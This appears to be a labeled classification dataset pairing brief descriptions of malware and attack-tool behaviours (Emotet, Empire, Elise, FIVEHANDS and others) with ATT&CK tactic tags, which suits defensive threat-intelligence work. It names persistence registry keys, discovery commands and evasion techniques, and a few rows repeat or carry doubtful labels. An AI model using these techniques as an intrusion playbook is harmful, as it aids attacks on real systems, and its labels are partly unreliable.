Egregor has used rundll32 during execution.,['TA0005:Defense Evasion']
"Egregor's payloads are custom-packed, archived and encrypted to prevent analysis.",['TA0005:Defense Evasion']
Egregor can perform a language check of the infected system and can query the CPU information .,['TA0007:Discovery']
Egregor can enumerate all connected drives.,['TA0007:Discovery']
Egregor has used tools to gather information about users.,['TA0007:Discovery']
Egregor contains functionality to query the local/system time.,['TA0007:Discovery']
Egregor can perform a long sleep to evade detection.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
Egregor has used multiple anti-analysis and anti-sandbox techniques to prevent automated analysis by sandboxes.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
Egregor has communicated with its C2 servers via HTTPS protocol.,['TA0011:Command and Control']
Egregor has used batch files for execution and can launch Internet Explorer from cmd.exe.,['TA0002:Execution']
Elise injects DLL files into iexplore.exe.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"Elise encrypts several of its files, including configuration files.",['TA0005:Defense Evasion']
Elise is capable of launching a remote shell on the host to delete itself.,['TA0005:Defense Evasion']
A variant of Elise executes dir C:\progra~1 when initially run.,['TA0007:Discovery']
Elise can download additional files from the C2 server for execution.,['TA0011:Command and Control']
Elise executes net user after initial communication is made to the remote server.,['TA0007:Discovery']
Elise creates a file in AppData\Local\Microsoft\Windows\Explorer and stores all harvested data in that file.,['TA0009:Collection']
"If installing itself as a service fails, Elise instead writes itself as a file named svchost.exe saved in %APPDATA%\Microsoft\Network.",['TA0005:Defense Evasion']
Elise enumerates processes via the tasklist command.,['TA0007:Discovery']
"If establishing persistence by installation as a new service fails, one variant of Elise establishes persistence for the created .exe file by setting the following Registry key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\svchost : %APPDATA%\Microsoft\Network\svchost.exe. Other variants have set the following Registry keys for persistence: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\imejp : self and HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAStorD.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"After copying itself to a DLL file, a variant of Elise calls the DLL file using rundll32.exe.",['TA0005:Defense Evasion']
Elise exfiltrates data using cookie values that are Base64-encoded.,['TA0011:Command and Control']
Elise encrypts exfiltrated data with RC4.,['TA0011:Command and Control']
Elise executes systeminfo after initial communication is made to the remote server.,['TA0007:Discovery']
Elise executes ipconfig /all after initial communication is made to the remote server.,['TA0007:Discovery']
Elise executes net start after initial communication is made to the remote server.,['TA0007:Discovery']
Elise performs timestomping of a CAB file it creates.,['TA0005:Defense Evasion']
Elise communicates over HTTP or HTTPS for C2.,['TA0011:Command and Control']
Elise configures itself as a service.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
A variant of Emissary appends junk data to the end of its DLL file to create a large file that may exceed the maximum size that anti-virus programs can scan.,['TA0005:Defense Evasion']
Emissary injects its DLL file into a newly spawned Internet Explorer process.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"Variants of Emissary encrypt payloads using various XOR ciphers, as well as a custom algorithm that uses the ""srand"" and ""rand"" functions.",['TA0005:Defense Evasion']
Emissary has the capability to execute gpresult.,['TA0007:Discovery']
Emissary has the capability to download files from the C2 server.,['TA0011:Command and Control']
Emissary has the capability to execute the command net localgroup administrators.,['TA0007:Discovery']
Variants of Emissary have added Run Registry keys to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Variants of Emissary have used rundll32.exe in Registry values added to establish persistence.,['TA0005:Defense Evasion']
The C2 server response to a beacon sent by a variant of Emissary contains a 36-character GUID value that is used as an encryption key for subsequent network communications. Some variants of Emissary use various XOR operations to encrypt C2 data.,['TA0011:Command and Control']
Emissary has the capability to execute ver and systeminfo commands.,['TA0007:Discovery']
Emissary has the capability to execute the command ipconfig /all.,['TA0007:Discovery']
Emissary has the capability to execute the command net start to interact with services.,['TA0007:Discovery']
Emissary uses HTTP or HTTPS for C2.,['TA0011:Command and Control']
Emissary has the capability to create a remote shell and execute specified commands.,['TA0002:Execution']
Emissary is capable of configuring itself as a service.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Emotet inflates malicious files and malware as an evasion technique.,['TA0005:Defense Evasion']
"Emotet has obfuscated macros within malicious documents to hide the URLs hosting the malware, CMD.exe arguments, and PowerShell scripts.",['TA0005:Defense Evasion']
Emotet has been observed leveraging a module that retrieves passwords stored on a system for the current logged-on user.,['TA0006:Credential Access']
Emotet has been observed dropping browser password grabber modules.,['TA0006:Credential Access']
Emotet has used a self-extracting RAR file to deliver modules to victims. Emotet has also extracted embedded executables from files using hard-coded buffer offsets.,['TA0005:Defense Evasion']
Emotet has been observed injecting in to Explorer.exe and other processes.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Emotet has been observed leveraging a module that can scrape email addresses from Outlook.,['TA0007:Discovery']
Emotet has been observed leveraging a module that can scrape email addresses from Outlook.,['TA0009:Collection']
"Emotet has dropped an embedded executable at `%Temp%\setup.exe`. Additionally, Emotet may embed entire code into other files.",['TA0005:Defense Evasion']
Emotet has encrypted data before sending to the C2 server.,['TA0011:Command and Control']
Emotet uses obfuscated URLs to download a ZIP file.,['TA0005:Defense Evasion']
Emotet has exfiltrated data over its C2 channel.,['TA0010:Exfiltration']
Emotet has been seen exploiting SMB via a vulnerability exploit like EternalBlue to achieve lateral movement and propagation.,['TA0008:Lateral Movement']
Emotet has been observed dropping and executing password grabber modules including Mimikatz.,['TA0006:Credential Access']
Emotet has copied itself to remote systems using the `service.exe` filename.,['TA0008:Lateral Movement']
"Emotet can brute force a local admin password, then use it to facilitate lateral movement.","['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Emotet has been observed leveraging a module that scrapes email data from Outlook.,['TA0009:Collection']
Emotet has relied upon users clicking on a malicious attachment delivered through spearphishing.,['TA0002:Execution']
Emotet has relied upon users clicking on a malicious link delivered through spearphishing.,['TA0002:Execution']
Emotet has installed itself as a new service with the service name `Windows Defender System Service` and display name `WinDefService`.,['TA0005:Defense Evasion']
Emotet has used `CreateProcess` to create a new process to run its executable and `WNetEnumResourceW` to enumerate non-hidden shares.,['TA0002:Execution']
Emotet has enumerated non-hidden network shares using `WNetEnumResourceW`.,['TA0007:Discovery']
Emotet has been observed to hook network APIs to monitor network traffic.,"['TA0006:Credential Access', 'TA0007:Discovery']"
"Emotet has used HTTP over ports such as 20, 22, 443, 7080, and 50000, in addition to using ports commonly associated with HTTP/S.",['TA0011:Command and Control']
Emotet has been observed using a hard coded list of passwords to brute force user accounts.,['TA0006:Credential Access']
Emotet has used Powershell to retrieve the malicious payload and download additional resources like Mimikatz.,['TA0002:Execution']
Emotet has been observed enumerating local processes.,['TA0007:Discovery']
"Emotet uses a copy of `certutil.exe` stored in a temporary directory for process hollowing, starting the program in a suspended state before loading malicious code.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Emotet has reflectively loaded payloads into memory.,['TA0005:Defense Evasion']
Emotet has been observed adding the downloaded payload to the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run key to maintain persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Emotet uses RegSvr32 to execute the DLL payload.,['TA0005:Defense Evasion']
"Emotet has leveraged the Admin$, C$, and IPC$ shares for lateral movement.",['TA0008:Lateral Movement']
"Emotet has maintained persistence through a scheduled task, e.g. though a .dll file in the Registry.","['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Emotet has used custom packers to protect its payloads.,['TA0005:Defense Evasion']
Emotet has been delivered by phishing emails containing attachments.,['TA0001:Initial Access']
Emotet has been delivered by phishing emails containing links.,['TA0001:Initial Access']
"Emotet has used Google’s Protobufs to serialize data sent to and from the C2 server. Additionally, Emotet has used Base64 to encode data before sending to the C2 server.",['TA0011:Command and Control']
Emotet is known to use RSA keys for encrypting C2 traffic.,['TA0011:Command and Control']
Emotet has enumerated all users connected to network shares.,['TA0007:Discovery']
"Emotet has the ability to duplicate the user’s token. For example, Emotet may use a variant of Google’s ProtoBuf to send messages that specify how code will be executed.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Emotet has sent Microsoft Word documents with embedded macros that will invoke scripts to download additional payloads.,['TA0002:Execution']
Emotet has used HTTP for command and control.,['TA0011:Command and Control']
Emotet can extract names of all locally reachable Wi-Fi networks and then perform a brute-force attack to spread to new networks.,['TA0007:Discovery']
Emotet has used cmd.exe to run a PowerShell script.,['TA0002:Execution']
Emotet has used WMI to execute powershell.exe.,['TA0002:Execution']
Emotet has been observed creating new services to maintain persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Empire can use PowerSploit's Invoke-TokenManipulation to manipulate access tokens.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"Empire can leverage WMI debugging to remotely replace binaries like sethc.exe, Utilman.exe, and Magnify.exe with cmd.exe.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Empire can ZIP directories on the target system.,['TA0009:Collection']
Empire can use TLS to encrypt its C2 channel.,['TA0011:Command and Control']
"Empire can automatically gather the username, domain name, machine name, and other information from a compromised system.",['TA0009:Collection']
Empire has the ability to automatically send collected data back to the threat actors' C2.,['TA0010:Exfiltration']
Empire can use Dropbox and GitHub for C2.,['TA0011:Command and Control']
Empire has the ability to gather browser data such as bookmarks and visited sites.,['TA0007:Discovery']
Empire includes various modules to attempt to bypass UAC for escalation of privileges.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Empire can harvest clipboard data on both Windows and macOS systems.,['TA0009:Collection']
Empire has the ability to obfuscate commands using Invoke-Obfuscation.,['TA0005:Defense Evasion']
Empire uses a command-line interface to interact with systems.,['TA0002:Execution']
Empire can use Invoke-RunAs to make tokens.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"Empire contains some modules that leverage API hooking to carry out tasks, such as netripper.","['TA0009:Collection', 'TA0006:Credential Access']"
Empire can use various modules to search for files containing passwords.,['TA0006:Credential Access']
Empire can use modules that extract passwords from common web browsers such as Firefox and Chrome.,['TA0006:Credential Access']
Empire contains modules that can discover and exploit various DLL hijacking opportunities.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Empire can utilize Invoke-DCOM to leverage remote COM execution for lateral movement.,['TA0008:Lateral Movement']
Empire can acquire local and domain user account information.,['TA0007:Discovery']
Empire has a module for creating a new domain user if permissions allow.,['TA0003:Persistence']
Empire has modules for enumerating domain trusts.,['TA0007:Discovery']
Empire has a dylib hijacker module that generates a malicious dylib given the path to a legitimate dylib of a vulnerable application.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Empire can send data gathered from a target through the command and control channel.,['TA0010:Exfiltration']
Empire can use Dropbox for data exfiltration.,['TA0010:Exfiltration']
Empire can use GitHub for data exfiltration.,['TA0010:Exfiltration']
Empire can exploit vulnerabilities such as MS16-032 and MS16-135.,['TA0004:Privilege Escalation']
"Empire has a limited number of built-in modules for exploiting remote SMB, JBoss, and Jenkins servers.",['TA0008:Lateral Movement']
Empire includes various modules for finding files of interest on hosts and network shares.,['TA0007:Discovery']
Empire can leverage its implementation of Mimikatz to obtain and use golden tickets.,['TA0006:Credential Access']
Empire includes various modules for enumerating Group Policy.,['TA0007:Discovery']
Empire can use New-GPOImmediateTask to modify a GPO that will install and execute a malicious Scheduled Task/Job.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Empire can upload and download to and from a victim machine.,['TA0011:Command and Control']
Empire uses PowerSploit's Invoke-Kerberoast to request service tickets and return crackable ticket hashes.,['TA0006:Credential Access']
"Empire includes keylogging capabilities for Windows, Linux, and macOS systems.","['TA0009:Collection', 'TA0006:Credential Access']"
Empire can use Inveigh to conduct name service poisoning for credential theft and associated relay attacks.,"['TA0009:Collection', 'TA0006:Credential Access']"
Empire contains an implementation of Mimikatz to gather credentials from memory.,['TA0006:Credential Access']
Empire can acquire local and domain user account information.,['TA0007:Discovery']
Empire has a module for creating a local user if permissions allow.,['TA0003:Persistence']
Empire has the ability to collect emails on a target system.,['TA0009:Collection']
Empire can use built-in modules to abuse trusted utilities like MSBuild.exe.,['TA0005:Defense Evasion']
Empire contains a variety of enumeration modules that have an option to use API calls to carry out tasks.,['TA0002:Execution']
Empire can perform port scans from an infected host.,['TA0007:Discovery']
Empire can find shared drives on the local system.,['TA0007:Discovery']
Empire can be used to conduct packet captures on target hosts.,"['TA0006:Credential Access', 'TA0007:Discovery']"
Empire can perform pass the hash attacks.,"['TA0005:Defense Evasion', 'TA0008:Lateral Movement']"
Empire contains modules that can discover and exploit path interception opportunities in the PATH environment variable.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Empire contains modules that can discover and exploit search order hijacking vulnerabilities.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Empire contains modules that can discover and exploit unquoted path vulnerabilities.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Empire leverages PowerShell for the majority of its client-side agent tasks. Empire also contains the ability to conduct PowerShell remoting with the Invoke-PSRemoting module.,['TA0002:Execution']
Empire can use modules like Invoke-SessionGopher to extract private key and session information.,['TA0006:Credential Access']
Empire can find information about processes running on local and remote systems.,['TA0007:Discovery']
"Empire contains multiple modules for injecting into processes, such as Invoke-PSInject.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Empire can modify the registry run keys HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run and HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Empire can add a SID-History to a user if on a domain controller.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Empire contains modules for executing commands over SSH as well as in-memory VNC agent injection.,['TA0008:Lateral Movement']
Empire has modules to interact with the Windows task scheduler.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Empire is capable of capturing screenshots on Windows and macOS systems.,['TA0009:Collection']
Empire can enumerate antivirus software on the target.,['TA0007:Discovery']
Empire can enumerate Security Support Providers as well as utilize PowerSploit's Install-SSP and Invoke-Mimikatz to install malicious SSPs and log authentication events.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Empire can use PsExec to execute a payload on a remote host.,['TA0002:Execution']
Empire can persist by modifying a .LNK file to include a backdoor.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Empire can leverage its implementation of Mimikatz to obtain and use silver tickets.,['TA0006:Credential Access']
"Empire can enumerate host system information like OS, architecture, domain name, applied patches, and more.",['TA0007:Discovery']
"Empire can acquire network configuration information like DNS servers, public IP, and network proxies used by a host.",['TA0007:Discovery']
Empire can enumerate the current network connections of a host.,['TA0007:Discovery']
Empire can enumerate the username on targeted hosts.,['TA0007:Discovery']
Empire can timestomp any files or payloads placed on a target machine to help them blend in.,['TA0005:Defense Evasion']
Empire can capture webcam data on Windows and macOS systems.,['TA0009:Collection']
Empire can conduct command and control over protocols like HTTP and HTTPS.,['TA0011:Command and Control']
Empire has modules for executing scripts.,['TA0002:Execution']
Empire can use WMI to deliver a payload to a remote host.,['TA0002:Execution']
Empire can utilize built-in modules to modify service binaries and restore them to their original state.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
EnvyScout can collect sensitive NTLM material from a compromised host.,['TA0009:Collection']
EnvyScout can deobfuscate and write malicious ISO files to disk.,['TA0005:Defense Evasion']
EnvyScout can Base64 encode payloads.,['TA0005:Defense Evasion']
"EnvyScout can call window.location.pathname to ensure that embedded files are being executed from the C: drive, and will terminate if they are not.",['TA0005:Defense Evasion']
EnvyScout can use protocol handlers to coax the operating system to send NTLMv2 authentication responses to attacker-controlled infrastructure.,['TA0006:Credential Access']
EnvyScout contains JavaScript code that can extract an encoded blob from its HTML body and write it to disk.,['TA0005:Defense Evasion']
EnvyScout can use hidden directories and files to hide malicious executables.,['TA0005:Defense Evasion']
EnvyScout can write files to disk with JavaScript using a modified version of the open-source tool FileSaver.,['TA0002:Execution']
EnvyScout has been executed through malicious files attached to e-mails.,['TA0002:Execution']
EnvyScout has used folder icons for malicious files to lure victims into opening them.,['TA0005:Defense Evasion']
EnvyScout has the ability to proxy execution of malicious files with Rundll32.,['TA0005:Defense Evasion']
EnvyScout has been distributed via spearphishing as an email attachment.,['TA0001:Initial Access']
EnvyScout can determine whether the ISO payload was received by a Windows or iOS device.,['TA0007:Discovery']
EnvyScout can use cmd.exe to execute malicious files on compromised hosts.,['TA0002:Execution']
Epic encrypts collected data using a public key framework before sending it over the C2 channel. Some variants encrypt the collected data with AES and encode it with base64 before transmitting it to the C2 server.,['TA0009:Collection']
Epic compresses the collected data with bzip2 before sending it to the C2 server.,['TA0009:Collection']
Turla has used valid digital certificates from Sysprint AG to sign its Epic dropper.,['TA0005:Defense Evasion']
Epic has overwritten the function pointer in the extra window memory of Explorer's Shell_TrayWnd in order to execute malicious code in the context of the explorer.exe process.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Epic has a command to delete a file from the machine.,['TA0005:Defense Evasion']
"Epic recursively searches for all .doc files on the system and collects a directory listing of the Desktop, %TEMP%, and %WINDOWS%\Temp directories.",['TA0007:Discovery']
"Epic gathers a list of all user accounts, privilege classes, and time of last logon.",['TA0007:Discovery']
Epic gathers information on local group names.,['TA0007:Discovery']
Epic heavily obfuscates its code to make analysis more difficult.,['TA0005:Defense Evasion']
Epic uses the tasklist /v command to obtain a list of processes.,['TA0007:Discovery']
Epic uses the rem reg query command to obtain values from Registry keys.,['TA0007:Discovery']
Epic uses the net view command on the victim’s machine.,['TA0007:Discovery']
Epic searches for anti-malware services running on the victim’s machine and terminates itself if it finds them.,['TA0007:Discovery']
Epic encrypts commands from the C2 server using a hardcoded key.,['TA0011:Command and Control']
"Epic collects the OS version, hardware information, computer name, available system memory status, disk space information, and system and user language settings.",['TA0007:Discovery']
Epic uses the nbtstat -n and nbtstat -s commands on the victim’s machine.,['TA0007:Discovery']
"Epic uses the net use, net session, and netstat commands to gather information on network connections.",['TA0007:Discovery']
Epic collects the user name from the victim’s machine.,['TA0007:Discovery']
Epic uses the tasklist /svc command to list the services on the system.,['TA0007:Discovery']
Epic uses the net time command to get the system time from the machine and collect the current date and time zone information.,['TA0007:Discovery']
Epic uses HTTP and HTTPS for C2 communications.,['TA0011:Command and Control']
"EvilBunny has exploited CVE-2011-4369, a vulnerability in the PRC component in Adobe Reader.",['TA0002:Execution']
EvilBunny has deleted the initial dropper after running through the environment checks.,['TA0005:Defense Evasion']
EvilBunny has downloaded additional Lua scripts from the C2.,['TA0011:Command and Control']
EvilBunny has used Lua scripts to execute payloads.,['TA0002:Execution']
EvilBunny has used various API calls as part of its checks to see if the malware is running in a sandbox.,['TA0002:Execution']
EvilBunny has used EnumProcesses to identify how many process are running in the environment.,['TA0007:Discovery']
EvilBunny has created Registry keys for persistence in HKLM|HKCU\…\CurrentVersion\Run.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
EvilBunny has executed commands via scheduled tasks.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
EvilBunny has been observed querying installed antivirus software.,['TA0007:Discovery']
EvilBunny's dropper has checked the number of processes and the length and strings of its own file name to identify if the malware is in a sandbox environment.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
"EvilBunny has used the API calls NtQuerySystemTime, GetSystemTimeAsFileTime, and GetTickCount to gather time metrics as part of its checks to see if the malware is running in a sandbox.",['TA0007:Discovery']
EvilBunny has used time measurements from 3 different APIs before and after performing sleep operations to check and abort if the malware is running in a sandbox.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
EvilBunny has executed C2 commands directly via HTTP.,['TA0011:Command and Control']
EvilBunny has an integrated scripting engine to download and execute Lua scripts.,['TA0002:Execution']
EvilBunny has used WMI to gather information about the system.,['TA0002:Execution']
EvilGrab has the capability to capture audio from a victim machine.,['TA0009:Collection']
EvilGrab has the capability to capture keystrokes.,"['TA0009:Collection', 'TA0006:Credential Access']"
EvilGrab adds a Registry Run key for ctfmon.exe to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
EvilGrab has the capability to capture screenshots.,['TA0009:Collection']
EvilGrab has the capability to capture video from a victim machine.,['TA0009:Collection']
Exaramel for Linux has a hardcoded location that it uses to achieve persistence if the startup system is Upstart or System V and it is running as root.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Exaramel for Linux uses crontab for persistence if it does not have root privileges.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Exaramel for Linux can decrypt its configuration file.,['TA0005:Defense Evasion']
Exaramel for Linux uses RC4 for encrypting the configuration.,['TA0005:Defense Evasion']
Exaramel for Linux can attempt to find a new C2 server if it receives an error.,['TA0011:Command and Control']
Exaramel for Linux can uninstall its persistence mechanism and delete its configuration file.,['TA0005:Defense Evasion']
Exaramel for Linux has a command to download a file from and to a remote C2 server.,['TA0011:Command and Control']
Exaramel for Linux can execute commands with high privileges via a specific binary with setuid functionality.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Exaramel for Linux can run whoami to identify the system owner.,['TA0007:Discovery']
Exaramel for Linux has a hardcoded location under systemd that it uses to achieve persistence if it is running as root.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Exaramel for Linux has a command to execute a shell command on the system.,['TA0002:Execution']
Exaramel for Linux uses HTTPS for C2 communications.,['TA0011:Command and Control']
Exaramel for Windows automatically encrypts files before sending them to the C2 server.,['TA0009:Collection']
Exaramel for Windows stores the backdoor's configuration in the Registry in XML format.,['TA0005:Defense Evasion']
Exaramel for Windows specifies a path to store files scheduled for exfiltration.,['TA0009:Collection']
The Exaramel for Windows dropper creates and starts a Windows service named wsmprovav with the description “Windows Check AV” in an apparent attempt to masquerade as a legitimate service.,['TA0005:Defense Evasion']
Exaramel for Windows adds the configuration to the Registry in XML format.,['TA0005:Defense Evasion']
Exaramel for Windows has a command to execute VBS scripts on the victim’s machine.,['TA0002:Execution']
Exaramel for Windows has a command to launch a remote shell and executes commands on the victim’s machine.,['TA0002:Execution']
The Exaramel for Windows dropper creates and starts a Windows service named wsmprovav with the description “Windows Check AV.”,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Expand can be used to decompress a local or remote CAB file into an executable.,['TA0005:Defense Evasion']
Expand can be used to download or upload a file over a network share.,['TA0008:Lateral Movement']
Expand can be used to download or copy a file into an alternate data stream.,['TA0005:Defense Evasion']
Explosive has a function to use the OpenClipboard wrapper.,['TA0009:Collection']
Explosive can scan all .exe files located in the USB drive.,['TA0009:Collection']
Explosive has commonly set file and path attributes to hidden.,['TA0005:Defense Evasion']
Explosive has a function to download a file to the infected system.,['TA0011:Command and Control']
Explosive has leveraged its keylogging capabilities to gain access to administrator accounts on target servers.,"['TA0009:Collection', 'TA0006:Credential Access']"
Explosive has a function to write itself to Registry values.,['TA0005:Defense Evasion']
Explosive has a function to call the OpenClipboard wrapper.,['TA0002:Execution']
Explosive has encrypted communications with the RC4 method.,['TA0011:Command and Control']
Explosive has collected the computer name from the infected host.,['TA0007:Discovery']
Explosive has collected the MAC address from the victim's machine.,['TA0007:Discovery']
Explosive has collected the username from the infected host.,['TA0007:Discovery']
Explosive has used HTTP for communication.,['TA0011:Command and Control']
FALLCHILL can delete malware and associated artifacts from the victim.,['TA0005:Defense Evasion']
FALLCHILL can search files on a victim.,['TA0007:Discovery']
FALLCHILL uses fake Transport Layer Security to communicate with its C2 server.,['TA0011:Command and Control']
FALLCHILL encrypts C2 data with RC4 encryption.,['TA0011:Command and Control']
"FALLCHILL can collect operating system version information, processor information, system name, and information about installed disks from the victim.",['TA0007:Discovery']
FALLCHILL collects MAC address and local IP address information from the victim.,['TA0007:Discovery']
FALLCHILL can modify file or directory timestamps.,['TA0005:Defense Evasion']
FALLCHILL has been installed as a Windows service.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
FELIXROOT encrypts collected data with AES and Base64 and then sends it to the C2 server.,['TA0009:Collection']
FELIXROOT encrypts strings in the backdoor using a custom XOR algorithm.,['TA0005:Defense Evasion']
FELIXROOT deletes the .LNK file from the startup directory as well as the dropper components.,['TA0005:Defense Evasion']
FELIXROOT downloads and uploads files to and from the victim’s machine.,['TA0011:Command and Control']
FELIXROOT deletes the Registry key HKCU\Software\Classes\Applications\rundll32.exe\shell\open.,['TA0005:Defense Evasion']
FELIXROOT collects a list of running processes.,['TA0007:Discovery']
FELIXROOT queries the Registry for specific keys for potential privilege escalation and proxy information. FELIXROOT has also used WMI to query the Windows Registry.,['TA0007:Discovery']
FELIXROOT adds a shortcut file to the startup folder for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
FELIXROOT uses Rundll32 for executing the dropper program.,['TA0005:Defense Evasion']
FELIXROOT checks for installed security software like antivirus and firewall.,['TA0007:Discovery']
FELIXROOT creates a .LNK file for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"FELIXROOT collects the victim’s computer name, processor architecture, OS version, volume serial number, and system type.",['TA0007:Discovery']
FELIXROOT collects information about the network including the IP address and DHCP server.,['TA0007:Discovery']
FELIXROOT collects the username from the victim’s machine.,['TA0007:Discovery']
FELIXROOT gathers the time zone information from the victim’s machine.,['TA0007:Discovery']
FELIXROOT uses HTTP and HTTPS to communicate with the C2 server.,['TA0011:Command and Control']
"FELIXROOT executes batch scripts on the victim’s machine, and can launch a reverse shell for command execution.",['TA0002:Execution']
FELIXROOT uses WMI to query the Windows Registry.,['TA0002:Execution']
FIVEHANDS can receive a command line argument to limit file encryption to specified directories.,['TA0002:Execution']
FIVEHANDS can use an embedded NTRU public key to encrypt data for ransom.,['TA0040:Impact']
FIVEHANDS has the ability to decrypt its payload prior to execution.,['TA0005:Defense Evasion']
The FIVEHANDS payload is encrypted with AES-128.,['TA0005:Defense Evasion']
FIVEHANDS has the ability to enumerate files on a compromised host in order to encrypt files with specific extensions.,['TA0007:Discovery']
FIVEHANDS has the ability to delete volume shadow copies on compromised hosts.,['TA0040:Impact']
FIVEHANDS can enumerate network shares and mounted drives on a network.,['TA0007:Discovery']
FIVEHANDS can use WMI to delete files on a target machine.,['TA0002:Execution']
"FLASHFLOOD employs the same encoding scheme as SPACESHIP for data it stages. Data is compressed with zlib, and bytes are rotated four times before being XOR'ed with 0x23.",['TA0009:Collection']
"FLASHFLOOD searches for interesting files on the local system. FLASHFLOOD will scan the My Recent Documents, Desktop, Temporary Internet Files, and TEMP directories. FLASHFLOOD also collects information stored in the Windows Address Book.",['TA0009:Collection']
FLASHFLOOD searches for interesting files on removable media and copies them to a staging area. The default file types copied would include data copied to the drive by SPACESHIP.,['TA0009:Collection']
FLASHFLOOD searches for interesting files on the local system and removable media.,['TA0007:Discovery']
"FLASHFLOOD stages data it copies from the local system or removable drives in the ""%WINDIR%\$NtUninstallKB885884$\"" directory.",['TA0009:Collection']
FLASHFLOOD achieves persistence by making an entry in the Registry's Run key.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
FLIPSIDE uses RDP to tunnel traffic from a victim environment.,['TA0011:Command and Control']
FRAMESTING can embed itself in the CAV Python package of an Ivanti Connect Secure VPN located in `/home/venv3/lib/python3.6/site-packages/cav-0.1-py3.6.egg/cav/api/resources/category.py.`,['TA0003:Persistence']
FRAMESTING can send and receive zlib compressed data within `POST` requests.,['TA0011:Command and Control']
FRAMESTING can decompress data received within `POST` requests.,['TA0005:Defense Evasion']
FRAMESTING uses a cookie named `DSID` to mimic the name of a cookie used by Ivanti Connect Secure appliances for maintaining VPN sessions.,['TA0011:Command and Control']
FRAMESTING is a Python web shell that can embed in the Ivanti Connect Secure CAV Python package.,['TA0002:Execution']
FRAMESTING can retrieve C2 commands from values stored in the `DSID` cookie from the current HTTP request or from decompressed zlib data within the request's `POST` data.,['TA0011:Command and Control']
FRAMESTING is a web shell capable of enabling arbitrary command execution on compromised Ivanti Connect Secure VPNs.,['TA0003:Persistence']
FRP can be configured to only accept TLS connections.,['TA0011:Command and Control']
FRP can support the use of a JSON configuration file.,['TA0002:Execution']
The FRP client can be configured to connect to the server through a proxy.,['TA0011:Command and Control']
"As part of load balancing FRP can set `healthCheck.type = ""tcp""` or `healthCheck.type = ""http""` to check service status on specific hosts with TCPing or an HTTP request.",['TA0007:Discovery']
"FRP can communicate over TCP, TCP stream multiplexing, KERN Communications Protocol , QUIC, and UDP.",['TA0011:Command and Control']
FRP can tunnel SSH and Unix Domain Socket communications over TCP between external nodes and exposed resources behind firewalls or NAT.,['TA0011:Command and Control']
FRP can proxy communications through a server in public IP space to local servers located behind a NAT or firewall.,['TA0011:Command and Control']
FRP can use STCP with a preshared key to encrypt services exposed to public networks.,['TA0011:Command and Control']
FRP can use a dashboard and U/I to display the status of connections from the FRP client and server.,['TA0007:Discovery']
FRP has the ability to use HTTP and HTTPS to enable the forwarding of requests for internal services via domain name.,['TA0011:Command and Control']
FYAnti has the ability to decrypt an embedded .NET module.,['TA0005:Defense Evasion']
FYAnti can search the C:\Windows\Microsoft.NET\ directory for files of a specified size.,['TA0007:Discovery']
FYAnti can download additional payloads to a compromised host.,['TA0011:Command and Control']
FYAnti has used ConfuserEx to pack its .NET module.,['TA0005:Defense Evasion']
FakeM contains a keylogger module.,"['TA0009:Collection', 'TA0006:Credential Access']"
Some variants of FakeM use SSL to communicate with C2 servers.,['TA0011:Command and Control']
